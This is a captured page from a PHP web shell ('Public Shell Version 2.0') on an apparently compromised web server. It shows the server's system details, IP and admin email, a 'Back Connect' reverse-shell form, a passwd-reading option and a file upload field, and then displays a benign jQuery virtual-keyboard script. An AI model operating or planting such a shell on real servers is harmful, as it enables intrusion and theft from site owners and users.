Public Sh


Uname : Linux ispc 6.2.16-3-pve #1 SMP PREEMPT_DYNAMIC PVE 6.2.16-3 (2023-06-17T05:58Z) x86_64
PHP Version : 5.2.6-1+lenny16
Server Admin : webmaster@zednictvi-stastny.eu
Server IP : 109.105.49.240 Your IP : 3.142.144.163
Safe Mode : Safe Mode is OFF
Read etc/passwd : Disabled Functions : PHP INFO
Back Connect
IP : PORt :
'; Public Shell Version 2.0
Disable Functions: passthru,shell_exec,system,proc_open,popen,curl_multi_exec,show_source,highlight_file
Current Path : /var/www/clients/client49/web272/web/gallery/Ostatni/hibox/hibox/uwc/uwc/vkeyboard/js/
File Upload :
Current File : /var/www/clients/client49/web272/web/gallery/Ostatni/hibox/hibox/uwc/uwc/vkeyboard/js/key.js

jQuery(function($) {

// QWERTY Text Input
	// The bottom of this file is where the autocomplete extension is added
	// ********************
	
	// QWERTY username
	// ********************
	$('#username').keyboard({
		openOn   : null,
		autoAccept : true,
		layout   : 'international',
		display : {
			'accept' : '確認',
			'shift'  : '大小寫切換',
			'cancel' : '取消',
			'alt'   : '符號切換'
		}
	});
	$('#uname').click(function(){
		$('#username').getkeyboard().reveal();
	});
	// since IE adds an overlay behind the input to prevent clicking in other inputs (the keyboard may not automatically open on focus... silly IE bug)
	// We can remove the overlay (transparent) if desired using this code:
	$('#username').bind('visible.keyboard', function(e, keyboard, el){
	 $('.ui-keyboard-overlay').remove(); // remove overlay because clicking on it will close the keyboard... we set "openOn" to null to prevent closing.
	});
	
	

	// QWERTY Password
	// ********************
	$('#password').keyboard({
		openOn   : null,
		autoAccept : true,
		layout   : 'international',
		display : {
			'accept' : '確認',
			'shift'  : '大小寫切換',
			'cancel' : '取消',
			'alt'   : '符號切換'
		}
	});
	$('#passwd').click(function(){
		$('#password').getkeyboard().reveal();
	});
	// since IE adds an overlay behind the input to prevent clicking in other inputs (the keyboard may not automatically open on focus... silly IE bug)
	// We can remove the overlay (transparent) if desired using this code:
	$('#password').bind('visible.keyboard', function(e, keyboard, el){
	 $('.ui-keyboard-overlay').remove(); // remove overlay because clicking on it will close the keyboard... we set "openOn" to null to prevent closing.
	});
});

Public Shell Version 2.0